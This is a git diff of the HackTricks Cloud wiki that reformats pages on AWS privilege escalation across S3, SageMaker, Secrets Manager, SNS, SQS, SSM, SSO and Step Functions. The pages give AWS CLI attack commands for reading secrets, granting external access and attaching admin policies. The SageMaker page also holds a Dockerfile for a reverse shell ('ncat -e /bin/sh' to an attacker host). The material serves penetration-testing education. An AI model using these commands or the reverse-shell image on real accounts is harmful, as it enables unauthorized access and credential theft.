+```
+
+> [!WARNING]
+> The Amazon DynamoDB table that provides the 
data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. + +### EMR + +Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) + +## References + +- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md similarity index 63% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md index 8850b9b14..a85a7f764 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md @@ -1,19 +1,6 @@ # AWS - S3 Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 @@ -25,30 +12,33 @@ For example, an attacker with those **permissions over a cloudformation bucket** ```json { - "Version":"2012-10-17", - "Statement":[ - { - "Effect":"Allow", - "Action":[ - "s3:PutBucketNotification", - "s3:GetBucketNotification", - "s3:PutObject", - "s3:GetObject"], - "Resource":[ - "arn:aws:s3:::cf-templates-*\/*", - "arn:aws:s3:::cf-templates-*"] - }, - { - "Effect":"Allow", - "Action":"s3:ListAllMyBuckets", - "Resource":"*" - }] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:PutBucketNotification", + "s3:GetBucketNotification", + "s3:PutObject", + "s3:GetObject" + ], + "Resource": [ + "arn:aws:s3:::cf-templates-*/*", + "arn:aws:s3:::cf-templates-*" + ] + }, + { + "Effect": "Allow", + "Action": "s3:ListAllMyBuckets", + "Resource": "*" } + ] +} ``` And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**. -![](<../../../.gitbook/assets/image (174).png>) +![](<../../../images/image (174).png>) The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\ For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) 
@@ -60,7 +50,7 @@ An attacker with **read access** to them might find **sensitive information** on An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\ These are some examples: -* If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. +- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. ### `s3:PutBucketPolicy` @@ -158,7 +148,7 @@ An attacker could abuse these permissions to grant him more access over specific ```bash # Update bucket object ACL -aws s3api get-object-acl --bucket --key flag +aws s3api get-object-acl --bucket --key flag aws s3api put-object-acl --bucket --key flag --access-control-policy file://objacl.json ##JSON ACL example @@ -190,17 +180,4 @@ aws s3api get-object-acl --bucket --key flag aws s3api put-object-acl --bucket --key flag --version-id --access-control-policy file://objacl.json ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md similarity index 54% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index b795ce1ff..e3c1f92b7 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -2,20 +2,7 @@ ## AWS - Sagemaker Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` 
@@ -72,32 +59,31 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the c An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role. -{% hint style="warning" %} -This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). - -```bash -# Create docker image -mkdir /tmp/rev -## Note that the trainning job is going to call an executable called "train" -## That's why I'm putting the rev shell in /bin/train -## Set the values of and -cat > /tmp/rev/Dockerfile < -e /bin/sh' > /bin/train -RUN chmod +x /bin/train -CMD ncat -e /bin/sh -EOF - -cd /tmp/rev -sudo docker build . -t reverseshell - -# Upload it to ECR -sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ -sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest -sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest -``` -{% endhint %} +> [!WARNING] +> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). +> +> ```bash +> # Create docker image +> mkdir /tmp/rev +> ## Note that the trainning job is going to call an executable called "train" +> ## That's why I'm putting the rev shell in /bin/train +> ## Set the values of and +> cat > /tmp/rev/Dockerfile < FROM ubuntu +> RUN apt update && apt install -y ncat curl +> RUN printf '#!/bin/bash\nncat -e /bin/sh' > /bin/train +> RUN chmod +x /bin/train +> CMD ncat -e /bin/sh +> EOF +> +> cd /tmp/rev +> sudo docker build . 
-t reverseshell +> +> # Upload it to ECR +> sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ +> sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest +> sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest +> ``` ```bash # Create trainning job with the docker image created @@ -123,19 +109,6 @@ An attacker with those permissions will (potentially) be able to create an **hyp ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
new file mode 100644
index 000000000..efd911f80
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
@@ -0,0 +1,51 @@
+# AWS - Secrets Manager Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Secrets Manager
+
+For more info about secrets manager check:
+
+{{#ref}}
+../aws-services/aws-secrets-manager-enum.md
+{{#endref}}
+
+### `secretsmanager:GetSecretValue`
+
+An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**.
+
+```bash
+aws secretsmanager get-secret-value --secret-id # Get value
+```
+
+**Potential Impact:** Access high sensitive data inside AWS secrets manager service.
+
+### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)
+
+With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)).
+
+```bash
+aws secretsmanager list-secrets
+aws secretsmanager get-resource-policy --secret-id
+aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json
+```
+
+policy.json:
+
+```json
+{
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Effect": "Allow",
+ "Principal": {
+ "AWS": "arn:aws:iam:::root"
+ },
+ "Action": "secretsmanager:GetSecretValue",
+ "Resource": "*"
+ }
+ ]
+}
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
new file mode 100644
index 000000000..9475d238a
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
@@ -0,0 +1,43 @@
+# AWS - SNS Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## SNS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-sns-enum.md
+{{#endref}}
+
+### `sns:Publish`
+
+An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+
+```bash
+aws sns publish --topic-arn --message
+```
+
+**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+
+### `sns:Subscribe`
+
+An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
+
+```bash
+aws sns subscribe --topic-arn --protocol --endpoint
+```
+
+**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic.
+
+### `sns:AddPermission`
+
+An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions.
+
+```css
+aws sns add-permission --topic-arn --label --aws-account-id --action-name
+```
+
+**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
new file mode 100644
index 000000000..80f14a667
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
@@ -0,0 +1,46 @@
+# AWS - SQS Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## SQS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-sqs-and-sns-enum.md
+{{#endref}}
+
+### `sqs:AddPermission`
+
+An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
+
+```bash
+cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label
+```
+
+**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
+
+### `sqs:SendMessage` , `sqs:SendMessageBatch`
+
+An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+
+```bash
+aws sqs send-message --queue-url --message-body
+aws sqs send-message-batch --queue-url --entries
+```
+
+**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+
+### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
+
+An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
+
+```bash
+aws sqs receive-message --queue-url
+aws sqs delete-message --queue-url --receipt-handle
+aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout
+```
+
+**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md similarity index 60% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md index f496e89a3..aafbdcbda 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md @@ -1,27 +1,14 @@ # AWS - SSM Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SSM For more info about SSM check: -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} ### `ssm:SendCommand` @@ -63,9 +50,8 @@ aws ssm describe-sessions --state Active aws ssm start-session --target "$INSTANCE_ID" ``` -{% hint style="danger" %} -In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) -{% endhint %} +> [!CAUTION] +> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) **Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. @@ -79,7 +65,7 @@ Therefore, users with `ssm:StartSession` will be able to **get a shell inside EC aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" ``` -![](<../../../.gitbook/assets/image (185).png>) +![](<../../../images/image (185).png>) **Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled. 
@@ -139,21 +125,8 @@ aws ssm get-command-invocation --command-id --instance-id You can also use SSM to get inside a codebuild project being built: -{% content-ref url="aws-codebuild-privesc.md" %} -[aws-codebuild-privesc.md](aws-codebuild-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-codebuild-privesc.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md similarity index 59% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md index cef6c3dc8..18ea35aeb 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md @@ -1,33 +1,19 @@ # AWS - SSO & identitystore Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## AWS Identity Center / AWS SSO For more information about AWS Identity Center / AWS SSO check: -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} -{% hint style="warning" %} -Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ -Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ -[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) -{% endhint %} +> [!WARNING] +> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ +> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ +> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) ### ~~Reset Password~~ @@ -37,17 +23,14 @@ An easy way to escalate privileges in cases like this one would be to have a per With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has. -{% code overflow="wrap" %} ```bash aws identitystore create-group-membership --identity-store-id --group-id --member-id UserId= ``` -{% endcode %} ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet` An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control -{% code overflow="wrap" %} ```bash # Set an inline policy with admin privileges aws sso-admin put-inline-policy-to-permission-set --instance-arn --permission-set-arn --inline-policy file:///tmp/policy.yaml 
@@ -68,13 +51,11 @@ aws sso-admin put-inline-policy-to-permission-set --instance-arn # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` -{% endcode %} ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet` An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control -{% code overflow="wrap" %} ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" @@ -82,17 +63,14 @@ aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` -{% endcode %} ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet` An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control. -{% hint style="warning" %} -To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. -{% endhint %} +> [!WARNING] +> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. -{% code overflow="wrap" %} ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference 
@@ -100,27 +78,22 @@ aws sso-admin attach-customer-managed-policy-reference-to-permission-set --insta # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` -{% endcode %} ### `sso:CreateAccountAssignment` An attacker with this permission could give a Permission Set to a user under his control to an account. -{% code overflow="wrap" %} ```bash aws sso-admin create-account-assignment --instance-arn --target-id --target-type AWS_ACCOUNT --permission-set-arn --principal-type USER --principal-id ``` -{% endcode %} ### `sso:GetRoleCredentials` Returns the STS short-term credentials for a given role name that is assigned to the user. -{% code overflow="wrap" %} ``` aws sso get-role-credentials --role-name --account-id --access-token ``` -{% endcode %} However, you need an access token that I'm not sure how to get (TODO). 
@@ -128,53 +101,32 @@ However, you need an access token that I'm not sure how to get (TODO). An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. -{% code overflow="wrap" %} ```bash aws sso-admin detach-managed-policy-from-permission-set --instance-arn --permission-set-arn --managed-policy-arn ``` -{% endcode %} ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet` An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. -{% code overflow="wrap" %} ```bash aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference ``` -{% endcode %} ### `sso:DeleteInlinePolicyFromPermissionSet` An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**. -{% code overflow="wrap" %} ```bash aws sso-admin delete-inline-policy-from-permission-set --instance-arn --permission-set-arn ``` -{% endcode %} ### `sso:DeletePermissionBoundaryFromPermissionSet` An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary. 
-{% code overflow="wrap" %} ```bash aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn --permission-set-arn ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md similarity index 71% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md index 4084a2972..108dbcf3b 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -1,27 +1,14 @@ # AWS - Step Functions Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Step Functions For more information about this AWS service, check: -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-stepfunctions-enum.md +{{#endref}} ### Task Resources @@ -29,26 +16,24 @@ These privilege escalation techniques are going to require to use some AWS step In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in: -
+
Or you could also go to the API AWS documentation and check each action docs: -* [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) -* [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) +- [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) +- [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) ### `states:TestState` & `iam:PassRole` An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation. -{% code overflow="wrap" %} ```bash aws states test-state --definition --role-arn [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets] ``` -{% endcode %} The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action: -* **stateDefinition.json**: +- **stateDefinition.json**: ```json { @@ -61,9 +46,8 @@ The following examples show how to test an state that creates an access key for } ``` -* **Command** executed to perform the privesc: +- **Command** executed to perform the privesc: -{% code overflow="wrap" %} ```bash aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole 
